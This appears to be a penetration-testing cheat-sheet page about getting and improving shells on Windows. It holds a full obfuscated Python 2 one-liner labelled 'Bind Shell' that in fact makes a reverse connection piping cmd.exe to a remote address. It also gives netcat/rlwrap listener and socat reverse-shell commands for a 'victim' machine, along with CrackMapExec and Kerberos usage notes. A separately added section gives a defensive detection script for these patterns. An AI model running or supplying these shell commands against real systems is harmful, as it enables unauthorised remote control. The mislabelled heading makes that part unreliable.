Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
Not much here yet... please feel free to contribute at my GitHub page.
Bind Shell
Python 2 one-liner (invoked through C:\Python27\python.exe; it relies on contextlib.nested, which does not exist in Python 3) that opens a socket to ipAddress:port and pipes cmd.exe's stdin and stdout over it in two threads. Customize the address and port before running it.
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect((ipAddress, port)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
The variables ipAddress and port need to be customized: ipAddress must be a string, port must be an integer.
Usually, after catching a reverse shell from a Windows machine through netcat, you already have a shell with full functionality. On occasion, however, the shell is limited in ways that can be truly annoying. The features I miss the most are command history (cycling through previous commands with the 'up' and 'down' arrows) and tab autocompletion. Working in a shell that lacks these vital features can feel quite disorienting.
Options for upgrading Windows reverse shells are more limited than for shells coming from a Linux machine.
rlwrap
You can mitigate some of the restrictions of poor netcat shells by wrapping the netcat listener with the rlwrap command. It is not installed in Kali Linux by default, so you will need to install it with sudo apt install rlwrap -y. Other distributions may or may not have it installed or available in their package manager.
rlwrap nc -lvnp $port
Start your netcat listener by first prefixing it with the rlwrap command, then specifying the port to listen on. Your shell will automatically be a bit more stable than running netcat by itself.
socat
Another powerful tool that can be used to get functional shells, do port forwarding, and much more is socat (Windows build: https://github.com/3ndG4me/socat).
From your attack platform, create a listener:
socat TCP4-LISTEN:$port,fork STDOUT
Upload to or compile socat.exe on the Windows victim machine.
On the Windows victim, create the reverse shell back to your waiting listener:
socat.exe TCP4:$ip:$port EXEC:'cmd.exe',pipes
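Both the Python one-liner above and the socat command leave the same footprint on the victim: a scripting or relay host (python.exe, socat.exe) that opens a TCP socket and then spawns cmd.exe with its standard handles redirected. The following is an added detection example written from the defender's side; it is not part of the original page and not code from any project mentioned here. It runs over a handful of constructed process-creation events (the pipe-separated ts/pid/ppid/image/cmd schema and the sample values are assumptions of this example, with IPs from the reserved documentation ranges) and flags three things: python.exe run with -c on inline code that references both socket and subprocess, socat.exe joining a TCP address to an EXEC: target, and cmd.exe whose parent is one of those hosts. The third check is the one that survives obfuscation, because it looks at the process tree rather than the command text.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation events (not real telemetry). One event per
# line, pipe-separated key=value fields; the field names (ts, pid, ppid, image,
# cmd) are an assumption of this example, not any vendor's schema.
SAMPLE_EVENTS = [
    r"ts=2024-05-01T09:12:01Z|pid=4120|ppid=900|image=C:\Windows\explorer.exe|cmd=C:\Windows\explorer.exe",
    r"ts=2024-05-01T09:12:07Z|pid=5016|ppid=4120|image=C:\Python27\python.exe|cmd=C:\Python27\python.exe -c (lambda __y, __g, __contextlib: ... socket.socket(socket.AF_INET, socket.SOCK_STREAM) ... subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdin=subprocess.PIPE) ...)",
    r"ts=2024-05-01T09:12:08Z|pid=5020|ppid=5016|image=C:\Windows\System32\cmd.exe|cmd=\windows\system32\cmd.exe",
    r"ts=2024-05-01T09:15:42Z|pid=6100|ppid=4120|image=C:\Users\Public\socat.exe|cmd=C:\Users\Public\socat.exe TCP4:192.0.2.10:4444 EXEC:'cmd.exe',pipes",
    r"ts=2024-05-01T09:15:43Z|pid=6105|ppid=6100|image=C:\Windows\System32\cmd.exe|cmd=cmd.exe",
    # Benign look-alikes: socat used as a plain port forwarder, python running a
    # script file, cmd.exe launched from the desktop shell.
    r"ts=2024-05-01T09:20:00Z|pid=6101|ppid=4120|image=C:\Tools\socat.exe|cmd=C:\Tools\socat.exe TCP4-LISTEN:8080,fork TCP4:198.51.100.7:80",
    r"ts=2024-05-01T09:21:10Z|pid=5030|ppid=4120|image=C:\Python27\python.exe|cmd=C:\Python27\python.exe C:\Tools\inventory.py",
    r"ts=2024-05-01T09:22:00Z|pid=5040|ppid=4120|image=C:\Windows\System32\cmd.exe|cmd=cmd.exe /c dir",
]

# Parents that, on this page, front an interactive cmd.exe over a socket.
SHELL_HOSTS = {"python.exe", "socat.exe"}


def parse_event(line: str) -> Dict[str, str]:
    """Split one pipe-separated key=value event line into a dict."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str], parents: Dict[str, str]) -> List[str]:
    """Return the list of reasons this event looks like a socket-backed shell."""
    reasons: List[str] = []
    image = basename(event.get("image", ""))
    lc = event.get("cmd", "").lower()

    # Inline Python that both opens a socket and spawns a process.
    if image.startswith("python") and " -c " in lc and "socket" in lc and "subprocess" in lc:
        reasons.append("python inline code opens a socket and spawns a process")

    # socat with a TCP address on one side and EXEC: on the other; a pure
    # TCP-to-TCP forwarder does not match.
    if image == "socat.exe" and "exec:" in lc and re.search(r"\btcp\d?(-listen)?:", lc):
        reasons.append("socat wires a TCP endpoint to an EXEC target")

    # Process-tree check: cmd.exe whose parent is one of the shell hosts.
    parent_image = basename(parents.get(event.get("ppid", ""), ""))
    if image == "cmd.exe" and parent_image in SHELL_HOSTS:
        reasons.append(f"cmd.exe spawned by {parent_image}")
    return reasons


def detect(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Walk events in order, remembering pid -> image so children can be tied to parents."""
    parents: Dict[str, str] = {}
    hits: List[Tuple[str, List[str]]] = []
    for line in lines:
        event = parse_event(line)
        parents[event["pid"]] = event.get("image", "")
        reasons = classify(event, parents)
        if reasons:
            hits.append((event["pid"], reasons))
    return hits


if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS):
        print(pid, "->", "; ".join(reasons))
```

Against the constructed events this flags pids 5016, 5020, 6100 and 6105 and leaves the forwarder, the script run and the desktop-launched cmd.exe alone. Real telemetry (Sysmon event 1, EDR process events) carries the same pid/ppid/image/command-line fields, so the logic ports directly; the parent-child rule is the one to keep even if the command-line patterns are tuned away.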
meterpreter
Another method of upgrading the functionality of a Windows reverse shell that I know of is to create a reverse shell payload that calls a meterpreter interactive shell. This shell interacts with the Metasploit Framework to provide additional functionality such as uploading and downloading files, attempting to elevate privileges to System, and more.
CrackMapExec (cme)
To use CME against a specific protocol run cme $protocol $options. Available protocols:
{http,smb,mssql}
    http    own stuff using HTTP(S)
    smb     own stuff using SMB and/or Active Directory
    mssql   own stuff using MSSQL and/or Active Directory
Using Kerberos
CME supports Kerberos authentication via the --kerberos flag. You must also export the KRB5CCNAME environment variable so that it points at the ticket (credential cache) to use; you can obtain such a ticket with Impacket's GetTGT.py.
When using --kerberos, you must specify the target by the same hostname (FQDN) that appears in the Kerberos ticket.